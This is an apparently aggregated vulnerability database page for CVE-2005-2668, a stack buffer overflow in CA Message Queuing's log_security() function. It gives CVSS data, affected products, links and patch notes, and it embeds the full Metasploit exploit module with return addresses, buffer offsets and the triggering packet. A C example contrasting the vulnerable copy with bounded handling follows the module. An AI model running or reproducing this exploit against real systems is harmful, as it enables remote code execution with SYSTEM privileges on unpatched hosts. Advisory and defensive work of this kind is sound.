CVE-2005-2668
CVSS 10.0
Published: 2005-08-23 00:00:00
Revised: 2011-03-07 21:24:51

[Original] Multiple buffer overflows in Computer Associates (CA) Message Queuing (CAM / CAFT) 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13 allow remote attackers to execute arbitrary code via unknown vectors.


[CNNVD] CA Unicenter CAM 'log_security()' Buffer Overflow Vulnerability (CNNVD-200508-250)

        CAM (CA Message Queuing) is the messaging service shared by CA Unicenter and a wide range of other CA products, among them the Unicenter Management Portal, which gives web access to enterprise management information.
        The CAM service's implementation contains a stack-based buffer overflow that a remote attacker can exploit to execute arbitrary code on the host. Passing an over-long parameter to the log_security() call overflows a fixed-size buffer; a crafted parameter value lets the attacker run instructions of their choosing in the context of the CAM service, which on Windows can yield SYSTEM-level access.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can cause a complete system outage]
Access complexity: LOW [no special access conditions required for exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:ca:unicenter_service_level_management:3.0.1   Computer Associates Unicenter Service Level Management 3.0.1
cpe:/a:ca:unicenter_management:4.0::lotus_notes_domino
cpe:/a:ca:unicenter_network_and_systems_management:3.1   Computer Associates Unicenter Network and Systems Management 3.1
cpe:/a:ca:unicenter_application_performance_monitor:3.5   Computer Associates Unicenter Application Performance Monitor 3.5
cpe:/a:ca:unicenter_tng:2.2:::jp
cpe:/a:ca:unicenter_tng:2.2   Computer Associates Unicenter TNG 2.2
cpe:/a:ca:messaging:1.5   Computer Associates CAM 1.5
cpe:/a:ca:etrust_admin:2.7
cpe:/a:ca:unicenter_enterprise_job_manager:1.0:sp1
cpe:/a:ca:unicenter_asset_management:3.2:sp2   Computer Associates Unicenter Asset Management 3.2 SP2
cpe:/a:ca:unicenter_asset_management:3.2:sp1   Computer Associates Unicenter Asset Management 3.2 SP1
cpe:/a:ca:messaging:1.7   Computer Associates CAM 1.7
cpe:/a:ca:unicenter_software_delivery:3.1:sp2   Computer Associates Unicenter Software Delivery 3.1 SP2
cpe:/a:ca:adviseit:2.4   Computer Associates AdviseIT 2.4
cpe:/a:ca:unicenter_management:4.1::microsoft_exchange
cpe:/a:ca:brightstor_san_manager:1.1   Computer Associates BrightStor SAN Manager 1.1
cpe:/a:ca:unicenter_data_transport_option:2.0   Computer Associates Unicenter Data Transport Option 2.0
cpe:/a:ca:unicenter_network_and_systems_management:3.0   Computer Associates Unicenter Network and Systems Management 3.0
cpe:/a:ca:unicenter_software_delivery:3.1:sp1   Computer Associates Unicenter Software Delivery 3.1 SP1
cpe:/a:ca:unicenter_management:4.0::microsoft_exchange
cpe:/a:ca:unicenter_management:5.0::web_servers
cpe:/a:ca:unicenter_management:3.5::websphere_mq
cpe:/a:ca:unicenter_nsm_wireless_network_management_option:3.0   Computer Associates Unicenter NSM Wireless Network Management Option 3.0
cpe:/a:ca:unicenter_asset_management:3.1   Computer Associates Unicenter Asset Management 3.1
cpe:/a:ca:etrust_admin:2.9
cpe:/a:ca:cleverpath_ecm:3.5   Computer Associates CleverPath ECM 3.5
cpe:/a:ca:unicenter_application_performance_monitor:3.0   Computer Associates Unicenter Application Performance Monitor 3.0
cpe:/a:ca:brightstor_portal:11.1   Computer Associates BrightStor Portal 11.1
cpe:/a:ca:unicenter_asset_management:4.0   Computer Associates Unicenter Asset Management 4.0
cpe:/a:ca:unicenter_software_delivery:3.0   Computer Associates Unicenter Software Delivery 3.0
cpe:/a:ca:unicenter_asset_management:4.0:sp1
cpe:/a:ca:unicenter_tng:2.1   Computer Associates Unicenter TNG 2.1
cpe:/a:ca:unicenter_tng:2.4   Computer Associates Unicenter TNG 2.4
cpe:/a:ca:unicenter_enterprise_job_manager:1.0:sp2
cpe:/a:ca:etrust_admin:2.1
cpe:/a:ca:cleverpath_aion:10.0   Computer Associates CleverPath Aion 10.0
cpe:/a:ca:messaging:1.11   Computer Associates CAM 1.11
cpe:/a:ca:cleverpath_predictive_analysis_server:2.0   Computer Associates CleverPath Predictive Analysis Server 2.0
cpe:/a:ca:unicenter_software_delivery:4.0:sp1
cpe:/a:ca:etrust_admin:8.0   Computer Associates eTrust Admin 8.0
cpe:/a:ca:brightstor_san_manager:1.1:sp2   Computer Associates BrightStor SAN Manager 1.1 SP2
cpe:/a:ca:unicenter_service_level_management:3.0   Computer Associates Unicenter Service Level Management 3.0
cpe:/a:ca:unicenter_performance_management:2.4:sp3:openvms   Computer Associates Unicenter Performance Management for OpenVMS 2.4 SP3
cpe:/a:ca:advantage_data_transport:3.0   Computer Associates Advantage Data Transport 3.0
cpe:/a:ca:unicenter_remote_control:6.0   Computer Associates Unicenter Remote Control 6.0
cpe:/a:ca:unicenter_management:5.0.1::web_servers
cpe:/a:ca:brightstor_san_manager:1.1:sp1   Computer Associates BrightStor SAN Manager 1.1 SP1
cpe:/a:ca:unicenter_management_portal:2.0   Computer Associates Unicenter Management Portal 2.0
cpe:/a:ca:etrust_admin:2.4
cpe:/a:ca:unicenter_jasmine:3.0   Computer Associates Unicenter Jasmine 3.0
cpe:/a:ca:unicenter_service_level_management:3.0.2   Computer Associates Unicenter Service Level Management 3.0.2
cpe:/a:ca:unicenter_software_delivery:4.0   Computer Associates Unicenter Software Delivery 4.0
cpe:/a:ca:brightstor_san_manager:11.1   Computer Associates BrightStor SAN Manager 11.1
cpe:/a:ca:unicenter_management_portal:3.1   Computer Associates Unicenter Management Portal 3.1
cpe:/a:ca:etrust_admin:8.1   Computer Associates eTrust Admin 8.1
cpe:/a:ca:cleverpath_olap:5.1   Computer Associates CleverPath OLAP 5.1
cpe:/a:ca:unicenter_service_level_management:3.5   Computer Associates Unicenter Service Level Management 3.5
cpe:/a:ca:unicenter_software_delivery:3.1   Computer Associates Unicenter Software Delivery 3.1
cpe:/a:ca:cleverpath_predictive_analysis_server:3.0   Computer Associates CleverPath Predictive Analysis Server 3.0
cpe:/a:ca:unicenter_tng:2.4.2   Computer Associates Unicenter TNG 2.4.2
cpe:/a:ca:unicenter_remote_control:6.0:sp1   Computer Associates Unicenter Remote Control 6.0 SP1
cpe:/a:ca:unicenter_asset_management:3.2   Computer Associates Unicenter Asset Management 3.2

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2668
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2668
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-250
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/619988
(UNKNOWN)  CERT-VN  VU#619988
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=32919
(VENDOR_ADVISORY)  MISC  http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=32919
http://www.securityfocus.com/bid/14622
(PATCH)  BID  14622
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp
(VENDOR_ADVISORY)  CONFIRM  http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp
http://secunia.com/advisories/16513
(VENDOR_ADVISORY)  SECUNIA  16513
http://www.vupen.com/english/advisories/2005/1482
(UNKNOWN)  VUPEN  ADV-2005-1482
http://www.osvdb.org/18916
(UNKNOWN)  OSVDB  18916

- Vulnerability information

CA Unicenter CAM 'log_security()' Buffer Overflow Vulnerability
Severity: Critical   Type: Buffer overflow
Published: 2005-08-23 00:00:00   Updated: 2005-10-20 00:00:00
Remote / Local
        CAM (CA Message Queuing) is the messaging service shared by CA Unicenter and a wide range of other CA products, among them the Unicenter Management Portal, which gives web access to enterprise management information.
        The CAM service's implementation contains a stack-based buffer overflow that a remote attacker can exploit to execute arbitrary code on the host. Passing an over-long parameter to the log_security() call overflows a fixed-size buffer; a crafted parameter value lets the attacker run instructions of their choosing in the context of the CAM service, which on Windows can yield SYSTEM-level access.

- Advisories and patches

        The vendor has released patches that fix this issue; patch download links:
        http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam111
        http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam107

- Vulnerability information (16825)

CA CAM log_security() Stack Buffer Overflow (Win32) (EDBID:16825)
Platform: windows   Type: remote
Published: 2010-09-20   Verified
Port: 0   Author: metasploit
##
# $Id: cam_log_security.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA CAM log_security() Stack Buffer Overflow (Win32)',
			'Description'    => %q{
					This module exploits a vulnerability in the CA CAM service
				by passing a long parameter to the log_security() function.
				The CAM service is part of TNG Unicenter. This module has
				been tested on Unicenter v3.1.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-2668'],
					['OSVDB', '18916'],
					['BID', '14622'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# W2API.DLL @ 0x01950000 - return to ESI
					['W2API.DLL TNG 2.3',  { 'Platform' => 'win', 'Ret' => 0x01951107 }],

					# Return to ESI in ws2help.dll
					['Windows 2000 SP0-SP4 English', { 'Platform' => 'win', 'Ret' => 0x750217ae }],
					['Windows XP SP0-SP1 English',   { 'Platform' => 'win', 'Ret' => 0x71aa16e5 }],
					['Windows XP SP2 English',       { 'Platform' => 'win', 'Ret' => 0x71aa1b22 }],
					['Windows 2003 SP0 English',     { 'Platform' => 'win', 'Ret' => 0x71bf175f }],
				],
			'DisclosureDate' => 'Aug 22 2005',
			'DefaultTarget' => 0))
	end


	def check
		connect
		ack = sock.get_once
		disconnect

		(ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe
	end

	def exploit
		connect

		# CAM answers a fresh connection with a 4-byte "ACK\x00" banner.
		# The module only warns when the banner is missing and still fires.
		ack = sock.get_once
		if (ack != "ACK\x00")
			print_status("The CAM service is not responding")
		end

		# 4096 bytes of printable filler; the log_security() buffer is
		# overrun long before the end of it.
		buf = rand_text_english(4096, payload_badchars)

		# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
		# The saved return address at offset 1016 is replaced with a
		# "return to ESI" gadget from the target table; ESI points into the
		# buffer at offset 1052, so the encoded payload is placed there.
		buf[ 1016, 4 ] = [target.ret].pack('V')
		buf[ 1052, payload.encoded.length ] = payload.encoded

		# 4-byte message header, the over-long parameter, then the NUL terminator
		sock.put("\xfa\xf9\x00\x10" + buf + "\x00")

		handler
		disconnect
	end

end
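The log_security() overflow described above and the message the module sends, as an added example that is neither CA's code nor the Metasploit module: a hypothetical reconstruction of the bug class in C (a caller-supplied parameter appended to a fixed stack buffer with no bound) beside a bounded version, plus a message handler that enforces a parameter length limit before any logging call sees the data. It goes beyond the page by also rejecting malformed framing (wrong header, missing terminator). The 4-byte header and the NUL terminator follow the module's send; the LOG_MSG_MAX and CAM_PARAM_MAX values and the framing interpretation are assumptions, not a CAM specification.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed sizes: CA's real buffer and protocol limits are not public. */
#define LOG_MSG_MAX   1024   /* assumed size of the logger's stack buffer */
#define CAM_PARAM_MAX 255    /* assumed policy limit on one parameter */

/* Vulnerable shape (hypothetical reconstruction of the bug class): the
 * parameter is appended to a fixed stack buffer with no length check, so a
 * parameter longer than the buffer overwrites saved registers and the
 * return address. Never pass untrusted input to this function. */
void log_security_vulnerable(const char *param)
{
    char msg[LOG_MSG_MAX];
    strcpy(msg, "security: ");
    strcat(msg, param);          /* unbounded copy: overflow when param is long */
    fputs(msg, stderr);
}

/* Bounded shape: snprintf() never writes past msg[] and the caller learns
 * whether the message was cut. Returns 1 if truncated, 0 if complete. */
int log_security_safe(const char *param, size_t param_len)
{
    char msg[LOG_MSG_MAX];
    int n = snprintf(msg, sizeof msg, "security: %.*s\n", (int)param_len, param);
    if (n < 0)
        return -1;
    fputs(msg, stderr);
    return (size_t)n >= sizeof msg ? 1 : 0;
}

/* Wire shape taken from the Metasploit module's send: a 4-byte header, the
 * parameter bytes, then a terminating NUL. Reading the header as a fixed
 * constant and the rest as one NUL-terminated parameter is an assumption. */
static const uint8_t CAM_HDR[4] = { 0xfa, 0xf9, 0x00, 0x10 };

enum cam_result { CAM_BAD_HDR = -1, CAM_UNTERMINATED = -2, CAM_TOO_LONG = -3 };

/* Validate one message and copy its parameter into out[] (NUL-terminated).
 * Returns the parameter length, or a negative cam_result. The length check
 * runs before any logging call, so the logger never sees an oversized value. */
int cam_handle_message(const uint8_t *pkt, size_t len, char *out, size_t out_sz)
{
    if (len < sizeof CAM_HDR || memcmp(pkt, CAM_HDR, sizeof CAM_HDR) != 0)
        return CAM_BAD_HDR;
    const uint8_t *p   = pkt + sizeof CAM_HDR;
    size_t         rem = len - sizeof CAM_HDR;
    const uint8_t *nul = memchr(p, 0, rem);
    if (nul == NULL)
        return CAM_UNTERMINATED;       /* no terminator inside the message */
    size_t plen = (size_t)(nul - p);
    if (plen > CAM_PARAM_MAX || plen >= out_sz)
        return CAM_TOO_LONG;           /* reject before copying a single byte */
    memcpy(out, p, plen);
    out[plen] = '\0';
    return (int)plen;
}

/* Build a message of the module's shape: header, param_len filler bytes, NUL.
 * Returns the total length, or 0 if buf is too small. */
size_t cam_build_message(uint8_t *buf, size_t buf_sz, size_t param_len, uint8_t fill)
{
    size_t need = sizeof CAM_HDR + param_len + 1;
    if (buf_sz < need)
        return 0;
    memcpy(buf, CAM_HDR, sizeof CAM_HDR);
    memset(buf + sizeof CAM_HDR, fill, param_len);
    buf[need - 1] = '\0';
    return need;
}

/* Demo: build a param_len-byte message (up to the module's 4096) and run it
 * through the handler; returns the handler's result. */
int cam_demo(size_t param_len)
{
    static uint8_t pkt[4096 + sizeof CAM_HDR + 1];
    char out[CAM_PARAM_MAX + 1];
    size_t n = cam_build_message(pkt, sizeof pkt, param_len, 'A');
    return n ? cam_handle_message(pkt, n, out, sizeof out) : CAM_TOO_LONG;
}

/* Demo: feed a param_len-byte parameter straight to the bounded logger. */
int log_demo(size_t param_len)
{
    static char param[4096];
    if (param_len > sizeof param)
        return -1;
    memset(param, 'A', param_len);
    return log_security_safe(param, param_len);
}

int main(void)
{
    printf("4096-byte parameter: handler %d, logger truncated %d\n", cam_demo(4096), log_demo(4096));
    printf("16-byte parameter:   handler %d, logger truncated %d\n", cam_demo(16), log_demo(16));
    return 0;
}
```

The handler's limit, not the logger's bound, is the fix that matters: once the parameter is checked at the message boundary, every downstream helper can rely on it, and the bounded logger is a second line of defence rather than the only one.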
		

- Vulnerability information (F83148)

CA CAM log_security() Stack Overflow (Win32) (PacketStormID:F83148)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit
CVE-2005-2668

This Metasploit module exploits a vulnerability in the CA CAM service by passing a long parameter to the log_security() function. The CAM service is part of TNG Unicenter. This Metasploit module has been tested on Unicenter v3.1.


- Vulnerability information

18916
CA Multiple Products Message Queuing (CAM/CAFT) Multiple Remote Overflows
Location: Remote / Network Access
Attack type: Input Manipulation
Impact: Loss of Integrity
Solution: Patch / RCS
Exploit: Public, Commercial
Disclosure: Vendor Verified

- Vulnerability description

Multiple buffer overflows exist in multiple CA products. The Message Queuing component fails to validate multiple unspecified parameters, as well as data passed to the log_security() function, resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution, resulting in a loss of integrity.

- Timeline

2005-08-22 Unknown
2005-10-18 2005-08-22

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, CA has released a patch to address this vulnerability.

- Credit

Unknown or incomplete

- Vulnerability information

Computer Associates Message Queuing Buffer Overflow Vulnerability
Class: Boundary Condition Error   BID: 14622
Remote: Yes   Local: Yes
Published: 2005-08-22 12:00:00   Updated: 2007-11-15 12:37:00
The discoverer of this vulnerability is currently unknown. The vendor disclosed this issue.

- Affected versions

Computer Associates Unicenter TNG JPN 2.2
Computer Associates Unicenter TNG 2.4.2
Computer Associates Unicenter TNG 2.4
Computer Associates Unicenter TNG 2.2
Computer Associates Unicenter TNG 2.1
Computer Associates Unicenter Software Delivery 4.0 SP1
Computer Associates Unicenter Software Delivery 4.0
Computer Associates Unicenter Software Delivery 3.1 SP2
Computer Associates Unicenter Software Delivery 3.1 SP1
Computer Associates Unicenter Software Delivery 3.1
Computer Associates Unicenter Software Delivery 3.0
Computer Associates Unicenter Service Level Management 3.5
Computer Associates Unicenter Service Level Management 3.0.2
Computer Associates Unicenter Service Level Management 3.0.1
Computer Associates Unicenter Service Level Management 3.0
Computer Associates Unicenter Remote Control 6.0 SP1
Computer Associates Unicenter Remote Control 6.0
Computer Associates Unicenter Performance Management for OpenVMS 2.4 SP3
Computer Associates Unicenter NSM Wireless Network Management Option 3.0
Computer Associates Unicenter Network and Systems Management 3.1
Computer Associates Unicenter Network and Systems Management 3.0
Computer Associates Unicenter Management Portal 3.1
Computer Associates Unicenter Management Portal 2.0
Computer Associates Unicenter Management for WebSphere MQ 3.5
Computer Associates Unicenter Management for Web Servers 5.0.1
Computer Associates Unicenter Management for Web Servers 5.0
Computer Associates Unicenter Management for Microsoft Exchange 4.1
Computer Associates Unicenter Management for Microsoft Exchange 4.0
Computer Associates Unicenter Management for Lotus Notes/Domino 4.0
Computer Associates Unicenter Jasmine 3.0
Computer Associates Unicenter Enterprise Job Manager 1.0 SP2
Computer Associates Unicenter Enterprise Job Manager 1.0 SP1
Computer Associates Unicenter Data Transport Option 2.0
Computer Associates Unicenter Asset Management 4.0 SP1
Computer Associates Unicenter Asset Management 4.0
Computer Associates Unicenter Asset Management 3.2 SP2
Computer Associates Unicenter Asset Management 3.2 SP1
Computer Associates Unicenter Asset Management 3.2
Computer Associates Unicenter Asset Management 3.1
Computer Associates Unicenter Application Performance Monitor 3.5
Computer Associates Unicenter Application Performance Monitor 3.0
Computer Associates eTrust Admin 8.1
Computer Associates eTrust Admin 8.0
Computer Associates eTrust Admin 2.9
Computer Associates eTrust Admin 2.7
Computer Associates eTrust Admin 2.4
Computer Associates eTrust Admin 2.1
Computer Associates CleverPath Predictive Analysis Server 3.0
Computer Associates CleverPath Predictive Analysis Server 2.0
Computer Associates CleverPath OLAP 5.1
Computer Associates CleverPath ECM 3.5
Computer Associates CleverPath Aion 10.0
Computer Associates CAM 1.11
Computer Associates CAM 1.07
Computer Associates CAM 1.05
Computer Associates BrightStor SAN Manager 11.1
Computer Associates BrightStor SAN Manager 1.1 SP2
Computer Associates BrightStor SAN Manager 1.1 SP1
Computer Associates BrightStor SAN Manager 1.1
Computer Associates BrightStor Portal 11.1
Computer Associates AdviseIT 2.4
Computer Associates Advantage Data Transport 3.0

- Unaffected versions

Computer Associates CAM 1.11 Build 29_13
Computer Associates CAM 1.07 Build 220_13

- Discussion

Computer Associates Message Queuing (CAM) is prone to a buffer-overflow vulnerability because the application fails to perform proper bounds checking on user-supplied data.

A successful attack can cause the process's execution stack to overflow and may ultimately allow arbitrary code to run in the context of the affected application. This may allow an attacker to escalate their privileges to SYSTEM level.

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

An exploit (cacam_logsecurity_win32.pm) as part of the Metasploit Framework has been released.

- Solution

The vendor has released updates addressing this and other issues.


Computer Associates CAM 1.11

Computer Associates CAM 1.07

Computer Associates CAM 1.05


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE; their official data sources are maintained on MITRE's websites.